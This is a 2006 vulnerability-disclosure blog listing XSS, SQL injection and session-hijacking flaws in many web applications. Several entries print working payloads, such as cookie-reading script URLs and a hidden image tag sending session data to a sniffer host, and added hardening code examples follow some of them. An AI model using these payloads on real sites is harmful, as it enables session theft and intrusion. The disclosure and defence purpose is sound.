by r0t,der4444,cembo,VietMafia

Tuesday, June 27, 2006

Multiple Browsers Information Disclosure vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
###############################################

Vuln. Description:


Multiple browsers contain a flaw which can be exploited by malicious people to disclose potentially sensitive information.
An error in the handling of redirections can be exploited to access documents served from another web site via the "object.documentElement.outerHTML" property.

Affected browsers:

MYweb4net Browser 3.8.8.0
http://www.mybrowser.web4net.net/

GreenBrowser 3.4.0622
http://www.morequick.com/

Maxthon v1.5.6 build 42
http://www.maxthon.com/

PhaseOut 5.4.4
http://www.phaseout.net/

FineBrowser Freeware version v3.2.2
http://www.finebrowser.com/

Slim Browser 4.07 build 100
http://www.flashpeak.com/

NetCaptor 4.5.7 Personal Edition
http://www.netcaptor.com/

Enigma Browser 3.8.8
http://www.suttondesigns.com/

Fast Browser Pro 8.1
http://fastbrowser.net/

GoSuRF Browser 2.62
http://gosurfbrowser.com/?ln=en

Previous versions of those browsers may also be affected.



Tested on Windows XP/SP2 and IE 6 (some of those browsers use the IE engine to run, but of course a not vuln. IE 6.0 was used for those tests).


Note: this advisory is based on Plebo Aesdi Nael's advisory for IE.

Reference URL: http://secunia.com/advisories/20825/


###############################################
Solution:
Disable Active Scripting support.
###############################################
More information @ unsecured-systems.com/forum/

Hostflow vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.hostflow.com/
affected versions:2.2.1-15 and previous
###############################################

Vuln. Description:

Hostflow contains a flaw which could allow a remote attacker to hijack user sessions. A remote attacker can retrieve the authentication information needed to hijack a user session if a user includes a URL link within a helpdesk message, because by default there isn't IP address verification. This would allow the attacker to take control of the victim's control panel.


example:

1.
post:
(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")
note: change "(" to "<" and ")" to ">"

2. Or it also works with a simple referral URL function.
For manual testing, use HTML code to create a hyperlink to a resource which will show you referral URLs; for example, some hit counter or statistics application does it well.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
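
The two gaps the Hostflow description names (no IP address verification, and helpdesk input that is not sanitised) can be closed as in the following added example, which is not Hostflow code and is not part of the original advisory. The class and function names, the addresses and the posted message are constructed for illustration, and it assumes the session identifier is what leaks through the referral URL.

```python
import html
import secrets

# Response header that stops browsers from sending the page URL to other sites.
REFERRER_HEADERS = {"Referrer-Policy": "no-referrer"}


class SessionStore:
    """In-memory session table that remembers the address each session logged in from."""

    def __init__(self):
        self._sessions = {}  # token -> (user, client_ip)

    def create(self, user, client_ip):
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user, client_ip)
        return token

    def validate(self, token, client_ip):
        """Return the user for a valid token, or None.

        A token presented from a different address than the one it was
        issued to is treated as leaked and is revoked.
        """
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, bound_ip = entry
        if client_ip != bound_ip:
            del self._sessions[token]
            return None
        return user


def render_helpdesk_message(text):
    """Encode a user-submitted message so markup in it is displayed, not interpreted."""
    return html.escape(text, quote=True)


def demo():
    store = SessionStore()
    token = store.create("customer1", "192.0.2.10")  # constructed addresses
    # Constructed message in the shape of the advisory's example post.
    posted = '<img src="http://sniffer.example/r0t.gif" width="0" height="0">'
    return {
        "same_address": store.validate(token, "192.0.2.10"),
        "other_address": store.validate(token, "198.51.100.7"),
        "after_revocation": store.validate(token, "192.0.2.10"),
        "rendered": render_helpdesk_message(posted),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Binding a session to one address logs out users whose address changes mid-session, so keeping the session identifier out of URLs remains the more robust part of the fix.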

HSPcomplete vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.swsoft.com/en/products/hspcomplete/
affected versions:3.2.2 , 3.3 Beta and prior
###############################################

Vuln. Description:

HSPcomplete contains a flaw that allows remote SQL injection attacks. Input passed to the "type" parameter in "report.php" and input passed to the "level" parameter in "custom_buttons.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

H-Sphere <=2.5.x XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.psoft.net/h_sphere2_info.html
affected versions:2.5.1 Beta 1 (2.5.1.801.20060621)
and previous
###############################################

Vuln. Description:



H-Sphere contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "next_template", "start", "curr_menu_id" and "arid" parameters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP?template_name=mailman/massmail.html&arid=46&curr_menu_id=&start=&next_template=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP?template_name=mailman/massmail.html&arid=46&curr_menu_id=&start=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP?template_name=mailman/massmail.html&arid=46&curr_menu_id=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP?template_name=mailman/massmail.html&arid=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, June 26, 2006

Zorum Forum <=3.5 vuln.

###############################################
Vuln. discovered by : r0t
Date: 26 june 2006
vendor:http://zorum.phpoutsourcing.com/
affected versions:3.5 and prior
###############################################

Vuln. Description:

1.
Zorum Forum contains a flaw that allows remote SQL injection attacks. Input passed to the "offset", "tid", "fromid", "sortby", "fromfrommethod" and "fromfromlist" parameters in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
Zorum Forum contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "frommethod", "list" and "method" parameters in "index.php", and to most of the parameters from the SQL injection vuln., isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Additional info:
Some of the parameters in both vulnerabilities will also give full path disclosure, and there are many other parameters which aren't properly sanitised.
And if that is not enough, you can also figure out something like SQL injection from the search engine module; just try adding some "unsanitised" input in any possible field and you will see.

ref:
Zorum Arbitrary Command Execution and SQL Injection Vulnerabilities
Zorum forum 3.5 sql injection exploit



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Hacker (Andrey Zhitkov)



He is a hacker. A genius and a troublemaker. His goal is to break into a banking network and become a millionaire. For him it is nothing more than a computer game. But soon he himself becomes a character in someone else's far-from-virtual game, and his friends and acquaintances die from real, not virtual, weapons…

Download

Sunday, June 25, 2006

DeluxeBB <=1.07 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.deluxebb.com/
affected versions:1.07 and prior
###############################################

Vuln. Description:

DeluxeBB contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "subject" and "to" parameters in "pm.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ICT - Infinite Core Technologies vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.infinitecore.com/
affected versions:1.0 Gold and prior
###############################################

Vuln. Description:

ICT contains a flaw that allows remote SQL injection attacks. Input passed to the "post" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

OpenForum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:www.2enetworx.com/dev/projects/openforum.asp
affected versions:1.2 Beta and prior
###############################################

Vuln. Description:

OpenForum contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "ofdisp" and "ofmsgid" parameters in "openforum.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

GL-SH Deaf Forum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.frank-karau.de/
affected versions:6.4.3 and prior
###############################################

Vuln. Description:

GL-SH Deaf Forum contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "sort" parameter in "show.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpQLAdmin vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://phpqladmin.com
affected versions:2.2.x and previous
###############################################

Vuln. Description:


phpQLAdmin contains multiple flaws that allow remote Cross-Site Scripting attacks. Input passed to the "domain" parameter in "user_add.php" and "unit_add.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, June 24, 2006

XennoBB XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.xennobb.com/
affected versions:1.0.5 and prior
###############################################

Vuln. Description:

XennoBB contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "tid" parameter in "messages.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

btw ...

Somebody asked me why comments on this blog are "censored" - moderated.
Every day there are almost 50 spammers with commercial spam, like credit loans and other shit... I'm not surprised, cause many of my reports/advisories are ecommerce web applications.
To fight with spammers ..hm... if it was one ..it would not be so difficult, but ...
Any way spam sucks...

In my last post I told that I will not have time to publish advisories and report about unsecured systems, and I told that I will post 10-15 and that will be the end, and other guys or VietMafia will continue to contribute advisories to the blog.
In place of 10-15 it became more than 50, cause VietMafia didn't .... So for me it's too easy to do nothing, that's why I didn't stop.. even though my time is limited. I will continue as long as I can.

And again there are some developers (2 from 50) who are shocked that I didn't contact them and report the vuln.
I regularly try to do this in every 100 advisories I try, with no successful result till now, so why must I?
So I think that we stay at one point: I can do only my job with success if you make mistakes, if you don't I can do my job.
Everyone makes mistakes and I'm not better than you, it's just my job to find out some mistakes.
At that point I also wanna say thanks to the Secunia and OSVDB guys for support.

And till now I haven't written the article which I had promised to write, cause I'm waiting for cembo to complete PVS-Pridels Vuln Scanner; if it will be a great tool my opinion can change and the content of the article too, that's why I better wait.
And before it will be published I will try it as an alternative for my fingers... :)

mvnForum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.mvnforum.com/
affected versions:1.0 GA and prior
###############################################

Vuln. Description:

mvnForum contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "member" and "activatecode" parameters in activatemember isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:
mvnForum/activatemember?activatecode=&member=%22%3Cscript%3Ealert('r0t')%3C/script%3E

mvnForum/activatemember?activatecode=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

UebiMiau Webmail XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.uebimiau.org/
affected versions:2.7.10 ,2.7.2 and prior
###############################################

Vuln. Description:

UebiMiau Webmail contains multiple flaws that allow remote Cross-Site Scripting attacks. Input passed to the "f_user" parameter in "index.php", to the "pag" parameter in "messages.php" and to the "lid", "tid" and "sid" parameters in "error.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Anthill SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://anthill.vmlinuz.ca/
affected versions:0.2.6 and 0.3.0 and prior
###############################################

Vuln. Description:

Anthill contains a flaw that allows remote SQL injection attacks. Input passed to the "order" parameter in "buglist.php" and input passed to the "bug" parameter in "query.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

note:
Successful exploitation of the query.php script requires that "magic_quotes_gpc" is disabled.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
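
The Anthill note ties the magic_quotes_gpc condition to query.php only, which fits a sort parameter: a value placed in ORDER BY sits outside any quotes, so quote escaping never touches it. The following added example (not Anthill code, not part of the original advisory) shows that case next to a hardened form; the table layout, column names, rows and function names are constructed, and SQLite stands in for the application's database.

```python
import sqlite3

# Columns a caller may sort by; anything else falls back to the default.
SORTABLE = {"id": "id", "title": "title", "severity": "severity"}


def magic_quotes(value):
    """Rough stand-in for magic_quotes_gpc: backslash-escape quotes and backslashes."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_list_query_unsafe(order):
    # 'Before' form: the value lands in ORDER BY outside any quotes,
    # so quote escaping changes nothing about how it is parsed.
    return "SELECT id, title FROM bugs ORDER BY " + magic_quotes(order)


def build_list_query(order):
    # Identifiers cannot be bound as parameters, so map the request value
    # onto a fixed set of column names instead of copying it into the SQL.
    column = SORTABLE.get(order, "id")
    return "SELECT id, title FROM bugs ORDER BY " + column


def get_bug(conn, bug):
    # Values can be bound: check the type, then pass it as a parameter.
    if not bug.isdigit():
        return None
    row = conn.execute("SELECT id, title FROM bugs WHERE id = ?", (int(bug),))
    return row.fetchone()


def make_db():
    """Constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE bugs (id INTEGER PRIMARY KEY, title TEXT, severity INTEGER)"
    )
    conn.executemany(
        "INSERT INTO bugs (id, title, severity) VALUES (?, ?, ?)",
        [(1, "typo in footer", 1), (2, "crash on save", 3), (3, "slow search", 2)],
    )
    return conn


def list_bugs(conn, order):
    return conn.execute(build_list_query(order)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    requested = "title DESC"  # no quotes, so escaping leaves it untouched
    print(build_list_query_unsafe(requested))  # caller text became SQL syntax
    print(build_list_query(requested))         # falls back to the default column
    print(list_bugs(conn, "severity"))
    print(get_bug(conn, "2"), get_bug(conn, "2 OR 1=1"))
```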

Thursday, June 22, 2006

BNBT TrinEdit vuln.

###############################################
Vuln. discovered by : r0t
Date: 22 june 2006
vendor:http://bnbteasytracker.sourceforge.net/
affected versions:7.7r3.2004.10.27 and prior
###############################################

Vuln. Description:

BNBT TrinEdit contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "filter" and "sort" parameters in "index.html" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


note:
It's possible that BNBT EasyTracker 7.7r3.2004.10.27 has the same problem.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, June 21, 2006

Azureus <=2.4.0.2 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://azureus.sourceforge.net/
affected versions:Azureus 2.4.0.2
Azureus Tracker version 2.4.0.2/2.0
and previous versions
###############################################

Vuln. Description:

Azureus : Java BitTorrent Client Tracker contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "search" parameter in "index.tmpl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
http://host:6969/index.tmpl?search=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
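
What "properly sanitised before being returned to the user" means for a reflected parameter such as "search" is shown in the following added example, which is not Azureus code and is not part of the original advisory: the value is encoded for the HTML context it is written into, and a small check reports parameters that come back unencoded. The page template and function names are constructed; the request URL is the advisory's own example.

```python
import html
from urllib.parse import parse_qs, urlsplit

MARKUP_CHARS = set("<>\"'")


def _params(url):
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def render_search_page_unsafe(url):
    # 'Before' form: the decoded value is copied into the page as-is.
    term = _params(url).get("search", [""])[0]
    return (
        '<form><input name="search" value="' + term + '"></form>\n'
        "<p>Results for: " + term + "</p>"
    )


def render_search_page(url):
    # Hardened form: encode &, <, > and both quote characters, which covers
    # the attribute value and the body text the term is written into.
    term = _params(url).get("search", [""])[0]
    safe = html.escape(term, quote=True)
    return (
        '<form><input name="search" value="' + safe + '"></form>\n'
        "<p>Results for: " + safe + "</p>"
    )


def reflected_raw(url, body):
    """Names of query parameters whose markup-bearing value appears unencoded in body."""
    found = []
    for name, values in _params(url).items():
        for value in values:
            if MARKUP_CHARS & set(value) and value in body:
                found.append(name)
                break
    return found


# Request from the advisory's example line.
EXAMPLE_URL = (
    "http://host:6969/index.tmpl"
    "?search=%22%3Cscript%3Ealert('r0t')%3C/script%3E"
)

if __name__ == "__main__":
    print(reflected_raw(EXAMPLE_URL, render_search_page_unsafe(EXAMPLE_URL)))
    print(reflected_raw(EXAMPLE_URL, render_search_page(EXAMPLE_URL)))
    print(render_search_page(EXAMPLE_URL))
```

The same check can be run against a test instance's real responses to confirm that a fix covers every parameter an advisory names.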

Enterprise Groupware System XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.enterprisegroupwaresystem.org/
affected versions:1.2.4 and prior
###############################################

Vuln. Description:

EGS contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "module" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

dev Vs def

While surfing I found an article from one developer (Jörg Stöber), a developer of Content*Builder.
The title of the article he wrote is - Defacing?!!
He says that now he knows what defacing means.
I suppose that he started to recognize that stuff after Kacper had discovered multiple remote file include vuln. in Content*Builder.
What happened later, you know if you look at the view count on milw0rm alone.
Also, as Jörg says, there were many deface attempts on sites which use their software.
Till that point I understood his message clearly, but then he starts to explain and teach about that stuff which he has known for some days only... And says that "script kiddies" mostly use open source to find variables where included remote files aren't properly sanitized.
On that point, Jörg, I also don't like defacers ... but most software auditors don't have anything to do with defacers like " Hack3d by TurKish HacKerS t34m!!!"; the only thing is that the work of most web application auditors/pentesters is used to attack websites using vuln. software.
And for a "script kiddie" the easiest way to deface is using a published PoC, where he must only change from http://victim-host.com/vuln_file.php?include_path= to your host name.
And I like developers like you ... who are dumb enough to code insecurely and at the same time also clever enough to teach/speak about security and give people a status, which kind of them can be used by yourself.
If you were lame at coding, then why must you now speak in that way? Try to look at your source better and not speak as a coder god, cause it still has more mistakes than my English.

Knowledge is power.

Ultimate eShop XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.ultimate-eshop.de/
affected versions:1.00 and prior
###############################################

Vuln. Description:

Ultimate eShop contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "subid" parameter in "index.cgi" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpTRADER Multiple SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:
www.bluehouse-project.de/index.php?area=1&p=product
affected versions:4.9 SP 5 and prior
###############################################

Vuln. Description:

phpTRADER contains a flaw that allows remote SQL injection attacks. Input passed to the "sectio" parameter in "login.php", "write_newad.php", "newad.php", "printad.php", "askseller.php", "browse.php", "showmemberads.php", "note_ad.php", "abuse.php", "buynow.php" and "confirm_newad.php", input passed to the "an" parameter in "printad.php" and "note_ad.php", input passed to the "who" parameter in "showmemberads.php" and input passed to the "adnr" parameter in "buynow.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

UltimateGoogle XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/google/
affected versions:1.00 and prior
###############################################

Vuln. Description:

UltimateGoogle contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "REQ" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

thinkWMS SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/thinkWMS/
affected versions:1.0 and prior
###############################################

Vuln. Description:

thinkWMS contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "index.php" and "printarticle.php" and input passed to the "catid" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Ultimate Estate vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/ultimate-estate/
affected versions:1.0 and prior
###############################################

Vuln. Description:

1.
Ultimate Estate contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "index.pl" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
Ultimate Estate contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "cat" parameter in "index.pl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Ultimate Auction XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.ultimate-auction.de/
affected versions:1.0 and prior
###############################################

Vuln. Description:

Ultimate Auction contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "item" parameter in "emailtofriend.pl" and "violation.pl", to the "seller" parameter in "vsoa.pl", to the "user" parameter in "userask.pl" and "leavefeed.pl", to the "itemnum" parameter in "userask.pl", to the "category" parameter in "itemlist.pl" and to the "query" parameter in "search.pl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

FineShop vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://fineshop.pl/
affected versions:3.0 and prior
###############################################


Vuln. Description:

1.
FineShop contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "promocja", "wysw" and "id_produc" parameters in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
FineShop contains a flaw that allows remote SQL injection attacks. Input passed to the "produkt", "id_produc" and "id_kat" parameters in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

IMGallery vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.imgallery.zor.pl/
affected versions:2.4 and prior
###############################################


Vuln. Description:

IMGallery contains a flaw that allows remote SQL injection attacks. Input passed to the "start" and "sort" parameters in "galeria.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, June 20, 2006

Atlassian JIRA™ Information Disclosure

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.atlassian.com/software/jira/
affected versions:
Enterprise Edition, Version: 3.6.2-#156
other versions also can be affected
###############################################

Vuln. Description:



Input passed via the URL when accessing "secure/ConfigureReleaseNote.jspa" directly isn't properly sanitised before being returned to the user in an error response. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Atlassian JIRA™ contains a flaw that allows malicious people to gain knowledge of various system information. Input passed to the "projectId" parameter in "secure/ConfigureReleaseNote.jspa" isn't properly sanitised before being returned to the user.
From the error message/report a remote attacker can get various system information, for example the full install path, the software in use and the general system configuration.


###############################################
Solution:
Restrict access to the "secure/ConfigureReleaseNote.jspa" script in a proxy server or firewall with URL filtering capabilities. This may affect functionality.

###############################################
More information @ unsecured-systems.com/forum/

phpMyForum <=4.1.3 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.phpmyforum.de/
affected versions:4.1.3 and prior
###############################################

Vuln. Description:

phpMyForum contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "highlight" parameter in "topic.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

CavoxCms SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.cavoxcms.ch/
affected versions:v1.0.16 and prior
###############################################

Vuln. Description:


CavoxCms contains a flaw that allows remote SQL injection attacks. Input passed to the "page" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, June 19, 2006

NC LinkList XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.php-linkverzeichnis.de/
affected versions:1.2 and prior
###############################################

Vuln. Description:

NC LinkList contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "cat" and "view" parameters in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Clubpage vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.powerbatt.com/c-page/
affected versions:Clubpage
###############################################

Vuln. Description:

1.
Clubpage contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "news_archive", "language" and "intranetLogin" parameters in "index.php", to the "sites_id" parameter in "sites.php" and to the "news_id" parameter in "news_more.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
Clubpage contains a flaw that allows remote SQL injection attacks. Input passed to the "category" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


note: XSS and SQL injection vulnerabilities can also be found in modules such as calendar, runers-script and others.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SLAB500 vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.slab500.com/
affected versions:SLAB500 and prior
###############################################

Vuln. Description:

SLAB500 contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "page" and "addcomment" parameters in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

note:
Input passed to the "page" parameter in "index.php" also causes full path disclosure, and there may be a minimal possibility of including files from local resources.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PHCDownload SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.phpcredo.com/
affected versions:
v1.0.0 Final
v1.0.0 Release Candidate 6
and prior
###############################################

Vuln. Description:


PHCDownload contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "category.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

AssoCIateD XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://herve.labas.free.fr/acid/en/
affected versions:v1.2.0 and prior
###############################################

Vuln. Description:

AssoCIateD contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "menu" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/index.php?p=gal&menu=1[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Arctic XSS

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:www.olate.co.uk/products/arctic/
affected versions:1.0.2 and prior
###############################################

Vuln. Description:

Input passed to the search results page and the "/index.php?cmd=search" Query field form isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Open-Realty SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.open-realty.org/
affected versions:2.3.1
###############################################

Vuln. Description:


